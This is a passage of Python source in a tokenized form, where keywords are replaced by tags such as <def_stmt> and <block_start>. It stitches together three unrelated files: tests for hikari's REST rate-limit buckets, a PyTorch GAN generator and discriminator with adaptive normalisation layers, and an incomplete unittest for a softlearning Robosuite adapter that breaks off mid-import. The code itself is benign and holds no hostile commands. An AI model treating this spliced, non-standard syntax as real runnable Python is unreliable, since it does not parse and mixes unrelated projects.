buckets.UNKNOWN_HASH])<def_stmt>test_is_unknown self name compiled_route<block_start><with_stmt>buckets.RESTBucket(name compiled_route float("inf"))<as>rl<block_start><assert_stmt>rl.is_unknown<is>(name<eq>buckets.UNKNOWN_HASH)<block_end><block_end><def_stmt>test_update_rate_limit self compiled_route<block_start><with_stmt>buckets.RESTBucket(__name__ compiled_route float("inf"))<as>rl<block_start>rl.remaining=1<line_sep>rl.limit=2<line_sep>rl.reset_at=3<line_sep>rl.period=2<with_stmt>mock.patch.object(hikari_date "monotonic" return_value=4.20)<block_start>rl.update_rate_limit(9 18 27)<block_end><assert_stmt>rl.remaining<eq>9<assert_stmt>rl.limit<eq>18<assert_stmt>rl.reset_at<eq>27<assert_stmt>rl.period<eq>27-4.20<block_end><block_end>@pytest.mark.parametrize("name" ["spaghetti" buckets.UNKNOWN_HASH])<def_stmt>test_drip self name compiled_route<block_start><with_stmt>buckets.RESTBucket(name compiled_route float("inf"))<as>rl<block_start>rl.remaining=1<line_sep>rl.drip()<assert_stmt>rl.remaining<eq>0<if>name<ne>buckets.UNKNOWN_HASH<else>1<block_end><block_end>@pytest.mark.asyncio()<async_keyword><def_stmt>test_acquire_when_unknown_bucket self compiled_route<block_start><with_stmt>buckets.RESTBucket(buckets.UNKNOWN_HASH compiled_route float("inf"))<as>rl<block_start>rl._lock=mock.AsyncMock()<with_stmt>mock.patch.object(rate_limits.WindowedBurstRateLimiter "acquire")<as>super_acquire<block_start><assert_stmt><await>rl.acquire()<is><none><block_end>rl._lock.acquire.assert_awaited_once_with()<line_sep>super_acquire.assert_not_called()<block_end><block_end>@pytest.mark.asyncio()<async_keyword><def_stmt>test_acquire_when_too_long_ratelimit self compiled_route<block_start><with_stmt>buckets.RESTBucket("spaghetti" compiled_route 60)<as>rl<block_start>rl.reset_at=time.perf_counter()+999999999999999999999999999<with_stmt>mock.patch.object(buckets.RESTBucket "is_rate_limited" return_value=<true>)<block_start><with_stmt>pytest.raises(errors.RateLimitTooLongError)<block_start><await>rl.acquire()<block_end><block_end><block_end><block_end>@pytest.mark.asyncio()<async_keyword><def_stmt>test_acquire self compiled_route<block_start><with_stmt>buckets.RESTBucket("spaghetti" compiled_route float("inf"))<as>rl<block_start>rl._lock=mock.AsyncMock()<with_stmt>mock.patch.object(rate_limits.WindowedBurstRateLimiter "acquire")<as>super_acquire<block_start><await>rl.acquire()<line_sep>super_acquire.assert_awaited_once_with()<line_sep>rl._lock.acquire.assert_awaited_once_with()<block_end><block_end><block_end><def_stmt>test_resolve_when_not_unknown self compiled_route<block_start><with_stmt>buckets.RESTBucket("spaghetti" compiled_route float("inf"))<as>rl<block_start><with_stmt>pytest.raises(RuntimeError match=r"Cannot resolve known bucket")<block_start>rl.resolve("test")<block_end><assert_stmt>rl.name<eq>"spaghetti"<block_end><block_end><def_stmt>test_resolve self compiled_route<block_start><with_stmt>buckets.RESTBucket(buckets.UNKNOWN_HASH compiled_route float("inf"))<as>rl<block_start>rl.resolve("test")<assert_stmt>rl.name<eq>"test"<block_end><block_end><block_end><class_stmt>TestRESTBucketManager<block_start>@pytest.mark.asyncio()<async_keyword><def_stmt>test_close_closes_all_buckets self<block_start><class_stmt>MockBucket<block_start><def_stmt>__init__ self<block_start>self.close=mock.Mock()<block_end><block_end>buckets_array=[MockBucket()<for>_ range(30)]<line_sep>mgr=buckets.RESTBucketManager(max_rate_limit=float("inf"))<line_sep>mgr.real_hashes_to_buckets={f"blah{i}":bucket<for>i,bucket enumerate(buckets_array)}<line_sep>mgr.close()<for_stmt>i,bucket enumerate(buckets_array)<block_start>bucket.close.assert_called_once() i<block_end><block_end>@pytest.mark.asyncio()<async_keyword><def_stmt>test_close_sets_closed_event self<block_start>mgr=buckets.RESTBucketManager(max_rate_limit=float("inf"))<assert_stmt><not>mgr.closed_event.is_set()<line_sep>mgr.close()<assert_stmt>mgr.closed_event.is_set()<block_end>@pytest.mark.asyncio()<async_keyword><def_stmt>test_start self<block_start><with_stmt>buckets.RESTBucketManager(max_rate_limit=float("inf"))<as>mgr<block_start><assert_stmt>mgr.gc_task<is><none><line_sep>mgr.start()<line_sep>mgr.start()<line_sep>mgr.start()<assert_stmt>mgr.gc_task<is><not><none><block_end><block_end>@pytest.mark.asyncio()<async_keyword><def_stmt>test_exit_closes self<block_start><with_stmt>mock.patch.object(buckets.RESTBucketManager "close")<as>close<block_start><with_stmt>mock.patch.object(buckets.RESTBucketManager "gc")<as>gc<block_start><with_stmt>buckets.RESTBucketManager(max_rate_limit=float("inf"))<as>mgr<block_start>mgr.start(0.01 32)<block_end>gc.assert_called_once_with(0.01 32)<block_end>close.assert_called()<block_end><block_end>@pytest.mark.asyncio()<async_keyword><def_stmt>test_gc_polls_until_closed_event_set self# This is shit, but it is good shit. <block_start><with_stmt>buckets.RESTBucketManager(max_rate_limit=float("inf"))<as>mgr<block_start>mgr.start(0.01)<assert_stmt>mgr.gc_task<is><not><none><assert_stmt><not>mgr.gc_task.done()<line_sep><await>hikari_test_helpers.idle()<assert_stmt>mgr.gc_task<is><not><none><assert_stmt><not>mgr.gc_task.done()<line_sep><await>hikari_test_helpers.idle()<line_sep>mgr.closed_event.set()<assert_stmt>mgr.gc_task<is><not><none><assert_stmt><not>mgr.gc_task.done()<line_sep>task=mgr.gc_task<line_sep><await>hikari_test_helpers.idle()<assert_stmt>mgr.gc_task<is><none><assert_stmt>task.done()<block_end><block_end>@pytest.mark.asyncio()<async_keyword><def_stmt>test_gc_calls_do_pass self<block_start><with_stmt>hikari_test_helpers.mock_class_namespace(buckets.RESTBucketManager slots_=<false>)(max_rate_limit=float("inf"))<as>mgr<block_start>mgr.do_gc_pass=mock.Mock()<line_sep>mgr.start(0.01 33)<try_stmt><block_start><await>hikari_test_helpers.idle()<line_sep>mgr.do_gc_pass.assert_called_with(33)<block_end><finally_stmt><block_start>mgr.gc_task.cancel()<block_end><block_end><block_end>@pytest.mark.asyncio()<async_keyword><def_stmt>test_do_gc_pass_any_buckets_that_are_empty_but_still_rate_limited_are_kept_alive self<block_start><with_stmt>hikari_test_helpers.mock_class_namespace(buckets.RESTBucketManager)(max_rate_limit=float("inf"))<as>mgr<block_start>bucket=mock.Mock()<line_sep>bucket.is_empty=<true><line_sep>bucket.is_unknown=<false><line_sep>bucket.reset_at=time.perf_counter()+999999999999999999999999999<line_sep>mgr.real_hashes_to_buckets["foobar"]=bucket<line_sep>mgr.do_gc_pass(0)<assert_stmt>"foobar"<in>mgr.real_hashes_to_buckets<line_sep>bucket.close.assert_not_called()<block_end><block_end>@pytest.mark.asyncio()<async_keyword><def_stmt>test_do_gc_pass_any_buckets_that_are_empty_but_not_rate_limited_and_not_expired_are_kept_alive self<block_start><with_stmt>hikari_test_helpers.mock_class_namespace(buckets.RESTBucketManager)(max_rate_limit=float("inf"))<as>mgr<block_start>bucket=mock.Mock()<line_sep>bucket.is_empty=<true><line_sep>bucket.is_unknown=<false><line_sep>bucket.reset_at=time.perf_counter()<line_sep>mgr.real_hashes_to_buckets["foobar"]=bucket<line_sep>mgr.do_gc_pass(10)<assert_stmt>"foobar"<in>mgr.real_hashes_to_buckets<line_sep>bucket.close.assert_not_called()<block_end><block_end>@pytest.mark.asyncio()<async_keyword><def_stmt>test_do_gc_pass_any_buckets_that_are_empty_but_not_rate_limited_and_expired_are_closed self<block_start><with_stmt>hikari_test_helpers.mock_class_namespace(buckets.RESTBucketManager)(max_rate_limit=float("inf"))<as>mgr<block_start>bucket=mock.Mock()<line_sep>bucket.is_empty=<true><line_sep>bucket.is_unknown=<false><line_sep>bucket.reset_at=time.perf_counter()-999999999999999999999999999<line_sep>mgr.real_hashes_to_buckets["foobar"]=bucket<line_sep>mgr.do_gc_pass(0)<assert_stmt>"foobar"<not><in>mgr.real_hashes_to_buckets<line_sep>bucket.close.assert_called_once()<block_end><block_end>@pytest.mark.asyncio()<async_keyword><def_stmt>test_do_gc_pass_any_buckets_that_are_not_empty_are_kept_alive self<block_start><with_stmt>hikari_test_helpers.mock_class_namespace(buckets.RESTBucketManager)(max_rate_limit=float("inf"))<as>mgr<block_start>bucket=mock.Mock()<line_sep>bucket.is_empty=<false><line_sep>bucket.is_unknown=<true><line_sep>bucket.reset_at=time.perf_counter()<line_sep>mgr.real_hashes_to_buckets["foobar"]=bucket<line_sep>mgr.do_gc_pass(0)<assert_stmt>"foobar"<in>mgr.real_hashes_to_buckets<line_sep>bucket.close.assert_not_called()<block_end><block_end>@pytest.mark.asyncio()<async_keyword><def_stmt>test_acquire_route_when_not_in_routes_to_real_hashes_makes_new_bucket_using_initial_hash self<block_start><with_stmt>buckets.RESTBucketManager(max_rate_limit=float("inf"))<as>mgr<block_start>route=mock.Mock()<with_stmt>mock.patch.object(buckets "_create_unknown_hash" return_value="UNKNOWN;bobs")<as>create_unknown_hash<block_start>mgr.acquire(route)<block_end><assert_stmt>"UNKNOWN;bobs"<in>mgr.real_hashes_to_buckets<assert_stmt>isinstance(mgr.real_hashes_to_buckets["UNKNOWN;bobs"] buckets.RESTBucket)<line_sep>create_unknown_hash.assert_called_once_with(route)<block_end><block_end>@pytest.mark.asyncio()<async_keyword><def_stmt>test_acquire_route_when_not_in_routes_to_real_hashes_doesnt_cache_route self<block_start><with_stmt>buckets.RESTBucketManager(max_rate_limit=float("inf"))<as>mgr<block_start>route=mock.Mock()<line_sep>route.create_real_bucket_hash=mock.Mock(wraps=<lambda>intial_hash:intial_hash+";bobs")<line_sep>mgr.acquire(route)<assert_stmt>mgr.routes_to_hashes.get(route.route)<is><none><block_end><block_end>@pytest.mark.asyncio()<async_keyword><def_stmt>test_acquire_route_when_route_cached_already_obtains_hash_from_route_and_bucket_from_hash self<block_start><with_stmt>buckets.RESTBucketManager(max_rate_limit=float("inf"))<as>mgr<block_start>route=mock.Mock()<line_sep>route.create_real_bucket_hash=mock.Mock(return_value="eat pant;1234")<line_sep>bucket=mock.Mock(reset_at=time.perf_counter()+999999999999999999999999999)<line_sep>mgr.routes_to_hashes[route.route]="eat pant"<line_sep>mgr.real_hashes_to_buckets["eat pant;1234"]=bucket<assert_stmt>mgr.acquire(route)<is>bucket<block_end><block_end>@pytest.mark.asyncio()<async_keyword><def_stmt>test_acquire_route_returns_context_manager self<block_start><with_stmt>buckets.RESTBucketManager(max_rate_limit=float("inf"))<as>mgr<block_start>route=mock.Mock()<line_sep>bucket=mock.Mock(reset_at=time.perf_counter()+999999999999999999999999999)<with_stmt>mock.patch.object(buckets "RESTBucket" return_value=bucket)<block_start>route.create_real_bucket_hash=mock.Mock(wraps=<lambda>intial_hash:intial_hash+";bobs")<assert_stmt>mgr.acquire(route)<is>bucket<block_end><block_end><block_end>@pytest.mark.asyncio()<async_keyword><def_stmt>test_acquire_unknown_route_returns_context_manager_for_new_bucket self<block_start><with_stmt>buckets.RESTBucketManager(max_rate_limit=float("inf"))<as>mgr<block_start>route=mock.Mock()<line_sep>route.create_real_bucket_hash=mock.Mock(return_value="eat pant;bobs")<line_sep>bucket=mock.Mock(reset_at=time.perf_counter()+999999999999999999999999999)<line_sep>mgr.routes_to_hashes[route.route]="eat pant"<line_sep>mgr.real_hashes_to_buckets["eat pant;bobs"]=bucket<assert_stmt>mgr.acquire(route)<is>bucket<block_end><block_end>@pytest.mark.asyncio()<async_keyword><def_stmt>test_update_rate_limits_if_wrong_bucket_hash_reroutes_route self<block_start><with_stmt>buckets.RESTBucketManager(max_rate_limit=float("inf"))<as>mgr<block_start>route=mock.Mock()<line_sep>route.create_real_bucket_hash=mock.Mock(wraps=<lambda>intial_hash:intial_hash+";bobs")<line_sep>mgr.routes_to_hashes[route.route]="123"<with_stmt>mock.patch.object(hikari_date "monotonic" return_value=27)<block_start><with_stmt>mock.patch.object(buckets "RESTBucket")<as>bucket<block_start>mgr.update_rate_limits(route "blep" 22 23 3.56)<block_end><block_end><assert_stmt>mgr.routes_to_hashes[route.route]<eq>"blep"<assert_stmt>mgr.real_hashes_to_buckets["blep;bobs"]<is>bucket.return_value<line_sep>bucket.return_value.update_rate_limit.assert_called_once_with(22 23 27+3.56)<block_end><block_end>@pytest.mark.asyncio()<async_keyword><def_stmt>test_update_rate_limits_if_unknown_bucket_hash_reroutes_route self<block_start><with_stmt>buckets.RESTBucketManager(max_rate_limit=float("inf"))<as>mgr<block_start>route=mock.Mock()<line_sep>route.create_real_bucket_hash=mock.Mock(wraps=<lambda>intial_hash:intial_hash+";bobs")<line_sep>mgr.routes_to_hashes[route.route]="123"<line_sep>bucket=mock.Mock()<line_sep>mgr.real_hashes_to_buckets["UNKNOWN;bobs"]=bucket<with_stmt>mock.patch.object(buckets "_create_unknown_hash" return_value="UNKNOWN;bobs")<as>create_unknown_hash<block_start><with_stmt>mock.patch.object(hikari_date "monotonic" return_value=27)<block_start>mgr.update_rate_limits(route "blep" 22 23 3.56)<block_end><block_end><assert_stmt>mgr.routes_to_hashes[route.route]<eq>"blep"<assert_stmt>mgr.real_hashes_to_buckets["blep;bobs"]<is>bucket<line_sep>bucket.resolve.assert_called_once_with("blep;bobs")<line_sep>bucket.update_rate_limit.assert_called_once_with(22 23 27+3.56)<line_sep>create_unknown_hash.assert_called_once_with(route)<block_end><block_end>@pytest.mark.asyncio()<async_keyword><def_stmt>test_update_rate_limits_if_right_bucket_hash_does_nothing_to_hash self<block_start><with_stmt>buckets.RESTBucketManager(max_rate_limit=float("inf"))<as>mgr<block_start>route=mock.Mock()<line_sep>route.create_real_bucket_hash=mock.Mock(wraps=<lambda>intial_hash:intial_hash+";bobs")<line_sep>mgr.routes_to_hashes[route.route]="123"<line_sep>bucket=mock.Mock(reset_at=time.perf_counter()+999999999999999999999999999)<line_sep>mgr.real_hashes_to_buckets["123;bobs"]=bucket<with_stmt>mock.patch.object(hikari_date "monotonic" return_value=27)<block_start>mgr.update_rate_limits(route "123" 22 23 7.65)<block_end><assert_stmt>mgr.routes_to_hashes[route.route]<eq>"123"<assert_stmt>mgr.real_hashes_to_buckets["123;bobs"]<is>bucket<line_sep>bucket.update_rate_limit.assert_called_once_with(22 23 27+7.65)<block_end><block_end>@pytest.mark.asyncio()<async_keyword><def_stmt>test_update_rate_limits_updates_params self<block_start><with_stmt>buckets.RESTBucketManager(max_rate_limit=float("inf"))<as>mgr<block_start>route=mock.Mock()<line_sep>route.create_real_bucket_hash=mock.Mock(wraps=<lambda>intial_hash:intial_hash+";bobs")<line_sep>mgr.routes_to_hashes[route.route]="123"<line_sep>bucket=mock.Mock(reset_at=time.perf_counter()+999999999999999999999999999)<line_sep>mgr.real_hashes_to_buckets["123;bobs"]=bucket<with_stmt>mock.patch.object(hikari_date "monotonic" return_value=27)<block_start>mgr.update_rate_limits(route "123" 22 23 5.32)<line_sep>bucket.update_rate_limit.assert_called_once_with(22 23 27+5.32)<block_end><block_end><block_end>@pytest.mark.parametrize(("gc_task" "is_started") [(<none> <false>) (mock.Mock(spec_set=asyncio.Task) <true>)])<def_stmt>test_is_started self gc_task is_started<block_start><with_stmt>buckets.RESTBucketManager(max_rate_limit=float("inf"))<as>mgr<block_start>mgr.gc_task=gc_task<assert_stmt>mgr.is_started<is>is_started<block_end><block_end><block_end>
<import_stmt>torch<import_stmt>torch.nn<as>nn<import_from_stmt>torch.nn.parameter Parameter<class_stmt>ResnetGenerator(nn.Module)<block_start><def_stmt>__init__ self input_nc output_nc ngf=64 n_blocks=6 img_size=256 light=<false><block_start><assert_stmt>(n_blocks<ge>0)<line_sep>super(ResnetGenerator self).__init__()<line_sep>self.input_nc=input_nc<line_sep>self.output_nc=output_nc<line_sep>self.ngf=ngf<line_sep>self.n_blocks=n_blocks<line_sep>self.img_size=img_size<line_sep>self.light=light<line_sep>DownBlock=[]<line_sep>DownBlock<augadd>[nn.ReflectionPad2d(3) nn.Conv2d(input_nc ngf kernel_size=7 stride=1 padding=0 bias=<false>) nn.InstanceNorm2d(ngf) nn.ReLU(<true>)]<line_sep># Down-Sampling n_downsampling=2<for_stmt>i range(n_downsampling)<block_start>mult=2<power>i<line_sep>DownBlock<augadd>[nn.ReflectionPad2d(1) nn.Conv2d(ngf<times>mult ngf<times>mult<times>2 kernel_size=3 stride=2 padding=0 bias=<false>) nn.InstanceNorm2d(ngf<times>mult<times>2) nn.ReLU(<true>)]<block_end># Down-Sampling Bottleneck mult=2<power>n_downsampling<for_stmt>i range(n_blocks)<block_start>DownBlock<augadd>[ResnetBlock(ngf<times>mult use_bias=<false>)]<block_end># Class Activation Map self.gap_fc=nn.Linear(ngf<times>mult 1 bias=<false>)<line_sep>self.gmp_fc=nn.Linear(ngf<times>mult 1 bias=<false>)<line_sep>self.conv1x1=nn.Conv2d(ngf<times>mult<times>2 ngf<times>mult kernel_size=1 stride=1 bias=<true>)<line_sep>self.relu=nn.ReLU(<true>)<line_sep># Gamma, Beta block <if_stmt>self.light<block_start>FC=[nn.Linear(ngf<times>mult ngf<times>mult bias=<false>) nn.ReLU(<true>) nn.Linear(ngf<times>mult ngf<times>mult bias=<false>) nn.ReLU(<true>)]<block_end><else_stmt><block_start>FC=[nn.Linear(img_size<floordiv>mult<times>img_size<floordiv>mult<times>ngf<times>mult ngf<times>mult bias=<false>) nn.ReLU(<true>) nn.Linear(ngf<times>mult ngf<times>mult bias=<false>) nn.ReLU(<true>)]<block_end>self.gamma=nn.Linear(ngf<times>mult ngf<times>mult bias=<false>)<line_sep>self.beta=nn.Linear(ngf<times>mult ngf<times>mult bias=<false>)<line_sep># Up-Sampling Bottleneck <for_stmt>i range(n_blocks)<block_start>setattr(self 'UpBlock1_'+str(i+1) ResnetAdaILNBlock(ngf<times>mult use_bias=<false>))<block_end># Up-Sampling UpBlock2=[]<for_stmt>i range(n_downsampling)<block_start>mult=2<power>(n_downsampling-i)<line_sep>UpBlock2<augadd>[nn.Upsample(scale_factor=2 mode='nearest') nn.ReflectionPad2d(1) nn.Conv2d(ngf<times>mult int(ngf<times>mult/2) kernel_size=3 stride=1 padding=0 bias=<false>) ILN(int(ngf<times>mult/2)) nn.ReLU(<true>)]<block_end>UpBlock2<augadd>[nn.ReflectionPad2d(3) nn.Conv2d(ngf output_nc kernel_size=7 stride=1 padding=0 bias=<false>) nn.Tanh()]<line_sep>self.DownBlock=nn.Sequential(*DownBlock)<line_sep>self.FC=nn.Sequential(*FC)<line_sep>self.UpBlock2=nn.Sequential(*UpBlock2)<block_end><def_stmt>forward self input<block_start>x=self.DownBlock(input)<line_sep>gap=torch.nn.functional.adaptive_avg_pool2d(x 1)<line_sep>gap_logit=self.gap_fc(gap.view(x.shape[0] -1))<line_sep>gap_weight=list(self.gap_fc.parameters())[0]<line_sep>gap=x<times>gap_weight.unsqueeze(2).unsqueeze(3)<line_sep>gmp=torch.nn.functional.adaptive_max_pool2d(x 1)<line_sep>gmp_logit=self.gmp_fc(gmp.view(x.shape[0] -1))<line_sep>gmp_weight=list(self.gmp_fc.parameters())[0]<line_sep>gmp=x<times>gmp_weight.unsqueeze(2).unsqueeze(3)<line_sep>cam_logit=torch.cat([gap_logit gmp_logit] 1)<line_sep>x=torch.cat([gap gmp] 1)<line_sep>x=self.relu(self.conv1x1(x))<line_sep>heatmap=torch.sum(x dim=1 keepdim=<true>)<if_stmt>self.light<block_start>x_=torch.nn.functional.adaptive_avg_pool2d(x 1)<line_sep>x_=self.FC(x_.view(x_.shape[0] -1))<block_end><else_stmt><block_start>x_=self.FC(x.view(x.shape[0] -1))<block_end>gamma,beta=self.gamma(x_) self.beta(x_)<for_stmt>i range(self.n_blocks)<block_start>x=getattr(self 'UpBlock1_'+str(i+1))(x gamma beta)<block_end>out=self.UpBlock2(x)<line_sep><return>out cam_logit heatmap<block_end><block_end><class_stmt>ResnetBlock(nn.Module)<block_start><def_stmt>__init__ self dim use_bias<block_start>super(ResnetBlock self).__init__()<line_sep>conv_block=[]<line_sep>conv_block<augadd>[nn.ReflectionPad2d(1) nn.Conv2d(dim dim kernel_size=3 stride=1 padding=0 bias=use_bias) nn.InstanceNorm2d(dim) nn.ReLU(<true>)]<line_sep>conv_block<augadd>[nn.ReflectionPad2d(1) nn.Conv2d(dim dim kernel_size=3 stride=1 padding=0 bias=use_bias) nn.InstanceNorm2d(dim)]<line_sep>self.conv_block=nn.Sequential(*conv_block)<block_end><def_stmt>forward self x<block_start>out=x+self.conv_block(x)<line_sep><return>out<block_end><block_end><class_stmt>ResnetAdaILNBlock(nn.Module)<block_start><def_stmt>__init__ self dim use_bias<block_start>super(ResnetAdaILNBlock self).__init__()<line_sep>self.pad1=nn.ReflectionPad2d(1)<line_sep>self.conv1=nn.Conv2d(dim dim kernel_size=3 stride=1 padding=0 bias=use_bias)<line_sep>self.norm1=adaILN(dim)<line_sep>self.relu1=nn.ReLU(<true>)<line_sep>self.pad2=nn.ReflectionPad2d(1)<line_sep>self.conv2=nn.Conv2d(dim dim kernel_size=3 stride=1 padding=0 bias=use_bias)<line_sep>self.norm2=adaILN(dim)<block_end><def_stmt>forward self x gamma beta<block_start>out=self.pad1(x)<line_sep>out=self.conv1(out)<line_sep>out=self.norm1(out gamma beta)<line_sep>out=self.relu1(out)<line_sep>out=self.pad2(out)<line_sep>out=self.conv2(out)<line_sep>out=self.norm2(out gamma beta)<line_sep><return>out+x<block_end><block_end><class_stmt>adaILN(nn.Module)<block_start><def_stmt>__init__ self num_features eps=1e-5<block_start>super(adaILN self).__init__()<line_sep>self.eps=eps<line_sep>self.rho=Parameter(torch.Tensor(1 num_features 1 1))<line_sep>self.rho.data.fill_(0.9)<block_end><def_stmt>forward self input gamma beta<block_start>in_mean,in_var=torch.mean(input dim=[2 3] keepdim=<true>) torch.var(input dim=[2 3] keepdim=<true>)<line_sep>out_in=(input-in_mean)/torch.sqrt(in_var+self.eps)<line_sep>ln_mean,ln_var=torch.mean(input dim=[1 2 3] keepdim=<true>) torch.var(input dim=[1 2 3] keepdim=<true>)<line_sep>out_ln=(input-ln_mean)/torch.sqrt(ln_var+self.eps)<line_sep>out=self.rho.expand(input.shape[0] -1 -1 -1)<times>out_in+(1-self.rho.expand(input.shape[0] -1 -1 -1))<times>out_ln<line_sep>out=out<times>gamma.unsqueeze(2).unsqueeze(3)+beta.unsqueeze(2).unsqueeze(3)<line_sep><return>out<block_end><block_end><class_stmt>ILN(nn.Module)<block_start><def_stmt>__init__ self num_features eps=1e-5<block_start>super(ILN self).__init__()<line_sep>self.eps=eps<line_sep>self.rho=Parameter(torch.Tensor(1 num_features 1 1))<line_sep>self.gamma=Parameter(torch.Tensor(1 num_features 1 1))<line_sep>self.beta=Parameter(torch.Tensor(1 num_features 1 1))<line_sep>self.rho.data.fill_(0.0)<line_sep>self.gamma.data.fill_(1.0)<line_sep>self.beta.data.fill_(0.0)<block_end><def_stmt>forward self input<block_start>in_mean,in_var=torch.mean(input dim=[2 3] keepdim=<true>) torch.var(input dim=[2 3] keepdim=<true>)<line_sep>out_in=(input-in_mean)/torch.sqrt(in_var+self.eps)<line_sep>ln_mean,ln_var=torch.mean(input dim=[1 2 3] keepdim=<true>) torch.var(input dim=[1 2 3] keepdim=<true>)<line_sep>out_ln=(input-ln_mean)/torch.sqrt(ln_var+self.eps)<line_sep>out=self.rho.expand(input.shape[0] -1 -1 -1)<times>out_in+(1-self.rho.expand(input.shape[0] -1 -1 -1))<times>out_ln<line_sep>out=out<times>self.gamma.expand(input.shape[0] -1 -1 -1)+self.beta.expand(input.shape[0] -1 -1 -1)<line_sep><return>out<block_end><block_end><class_stmt>Discriminator(nn.Module)<block_start><def_stmt>__init__ self input_nc ndf=64 n_layers=5<block_start>super(Discriminator self).__init__()<line_sep>model=[nn.ReflectionPad2d(1) nn.utils.spectral_norm(nn.Conv2d(input_nc ndf kernel_size=4 stride=2 padding=0 bias=<true>)) nn.LeakyReLU(0.2 <true>)]<for_stmt>i range(1 n_layers-2)<block_start>mult=2<power>(i-1)<line_sep>model<augadd>[nn.ReflectionPad2d(1) nn.utils.spectral_norm(nn.Conv2d(ndf<times>mult ndf<times>mult<times>2 kernel_size=4 stride=2 padding=0 bias=<true>)) nn.LeakyReLU(0.2 <true>)]<block_end>mult=2<power>(n_layers-2-1)<line_sep>model<augadd>[nn.ReflectionPad2d(1) nn.utils.spectral_norm(nn.Conv2d(ndf<times>mult ndf<times>mult<times>2 kernel_size=4 stride=1 padding=0 bias=<true>)) nn.LeakyReLU(0.2 <true>)]<line_sep># Class Activation Map mult=2<power>(n_layers-2)<line_sep>self.gap_fc=nn.utils.spectral_norm(nn.Linear(ndf<times>mult 1 bias=<false>))<line_sep>self.gmp_fc=nn.utils.spectral_norm(nn.Linear(ndf<times>mult 1 bias=<false>))<line_sep>self.conv1x1=nn.Conv2d(ndf<times>mult<times>2 ndf<times>mult kernel_size=1 stride=1 bias=<true>)<line_sep>self.leaky_relu=nn.LeakyReLU(0.2 <true>)<line_sep>self.pad=nn.ReflectionPad2d(1)<line_sep>self.conv=nn.utils.spectral_norm(nn.Conv2d(ndf<times>mult 1 kernel_size=4 stride=1 padding=0 bias=<false>))<line_sep>self.model=nn.Sequential(*model)<block_end><def_stmt>forward self input<block_start>x=self.model(input)<line_sep>gap=torch.nn.functional.adaptive_avg_pool2d(x 1)<line_sep>gap_logit=self.gap_fc(gap.view(x.shape[0] -1))<line_sep>gap_weight=list(self.gap_fc.parameters())[0]<line_sep>gap=x<times>gap_weight.unsqueeze(2).unsqueeze(3)<line_sep>gmp=torch.nn.functional.adaptive_max_pool2d(x 1)<line_sep>gmp_logit=self.gmp_fc(gmp.view(x.shape[0] -1))<line_sep>gmp_weight=list(self.gmp_fc.parameters())[0]<line_sep>gmp=x<times>gmp_weight.unsqueeze(2).unsqueeze(3)<line_sep>cam_logit=torch.cat([gap_logit gmp_logit] 1)<line_sep>x=torch.cat([gap gmp] 1)<line_sep>x=self.leaky_relu(self.conv1x1(x))<line_sep>heatmap=torch.sum(x dim=1 keepdim=<true>)<line_sep>x=self.pad(x)<line_sep>out=self.conv(x)<line_sep><return>out cam_logit heatmap<block_end><block_end><class_stmt>RhoClipper(object)<block_start><def_stmt>__init__ self min max<block_start>self.clip_min=min<line_sep>self.clip_max=max<assert_stmt>min<l>max<block_end><def_stmt>__call__ self module<block_start><if_stmt>hasattr(module 'rho')<block_start>w=module.rho.data<line_sep>w=w.clamp(self.clip_min self.clip_max)<line_sep>module.rho.data=w<block_end><block_end><block_end>
<import_stmt>unittest<import_stmt>numpy<as>np<import_from_stmt>.softlearning_env_test AdapterTestClass<import_from_stmt>softlearning.environments.adapters.robosuite_adapter RobosuiteAdapter <class_stmt>TestRobosuiteAdapter(unittest.TestCase AdapterTestClass)# TODO(hartikainen): This is a terrible way of testing the envs. # All the envs should be tested independently. <block_start><def_stmt>create_adapter self domain='Sawyer' task='Lift' *args **kwargs<block_start><return>RobosuiteAdapter(domain task *args **kwargs has_renderer=<false> has_offscreen_renderer=<false> use_camera_obs=<false>)<block_end><def_stmt>test_environments self# Make sure that all the environments are creatable <block_start>TEST_ENVIRONMENTS=[('Sawyer' 'Lift')]<def_stmt>verify_reset_and_step domain task<block_start>env=RobosuiteAdapter(domain=domain task=task has_renderer=<false> has_offscreen_renderer=<false> use_camera_obs=<false>)<line_sep>env.reset()<line_sep>env.step(env.action_space.sample())<block_end><for_stmt>domain,task TEST_ENVIRONMENTS<block_start>verify_reset_and_step(domain task)<block_end><block_end><def_stmt>test_copy_environments self<block_start>domain,task='Sawyer' 'Lift'<line_sep>env_kwargs={"gripper_type":"TwoFingerGripper" "table_full_size":(0.8 0.8 0.8)}<line_sep>env1=self.create_adapter(domain=domain task=task **env_kwargs)<line_sep>env1.reset()<line_sep>env2=env1.copy()<line_sep>self.assertEqual(env1.observation_keys env2.observation_keys)<for_stmt>key,value env_kwargs.items()<block_start>self.assertEqual(getattr(env1.unwrapped key) value)<line_sep>self.assertEqual(getattr(env2.unwrapped key) value)<block_end>domain,task='Sawyer' 'Lift'<line_sep>robosuite_adapter_kwargs={'observation_keys':('joint_pos' 'joint_vel')}<line_sep>env_kwargs={"gripper_type":"TwoFingerGripper" "table_full_size":(0.8 0.8 0.8)}<line_sep>env1=self.create_adapter(domain=domain task=task **robosuite_adapter_kwargs **env_kwargs)<line_sep>env1.reset()<line_sep>env2=env1.copy()<for_stmt>key,value robosuite_adapter_kwargs.items()<block_start>self.assertEqual(getattr(env1 key) value)<line_sep>self.assertEqual(getattr(env2 key) value)<block_end><for_stmt>key,value env_kwargs.items()<block_start>self.assertEqual(getattr(env1.unwrapped key) value)<line_sep>self.assertEqual(getattr(env2.unwrapped key) value)<block_end><block_end><def_stmt>test_fails_with_invalid_environment_kwargs self<block_start>domain,task='Sawyer' 'Lift'<line_sep>robosuite_adapter_kwargs={'observation_keys':('joint_pos' 'invalid_key')}<with_stmt>self.assertRaises(AssertionError)<block_start>env=self.create_adapter(domain=domain task=task **robosuite_adapter_kwargs)<block_end><block_end><def_stmt>test_environment_kwargs self<block_start>env_kwargs={"has_renderer":<false> "has_offscreen_renderer":<false> "use_camera_obs":<false> "control_freq":10 "horizon":1000}<line_sep>env=RobosuiteAdapter(domain='Sawyer' task='Lift' **env_kwargs)<line_sep>observation1,reward,done,info=env.step(env.action_space.sample())<line_sep>self.assertAlmostEqual(reward 0.0)<for_stmt>key,expected_value env_kwargs.items()<block_start>actual_value=getattr(env.unwrapped key)<line_sep>self.assertEqual(actual_value expected_value)<block_end><block_end><def_stmt>test_render_rgb_array self<block_start>env=self.create_adapter()<with_stmt>self.assertRaises(NotImplementedError)<block_start>env.render()<block_end><block_end><def_stmt>test_render_human self<block_start>env=self.create_adapter()<with_stmt>self.assertRaises(NotImplementedError)<block_start>env.render()<block_end><block_end><def_stmt>test_fails_with_unnormalized_action_spec self<block_start><import_from_stmt>robosuite.environments.sawyer_lift 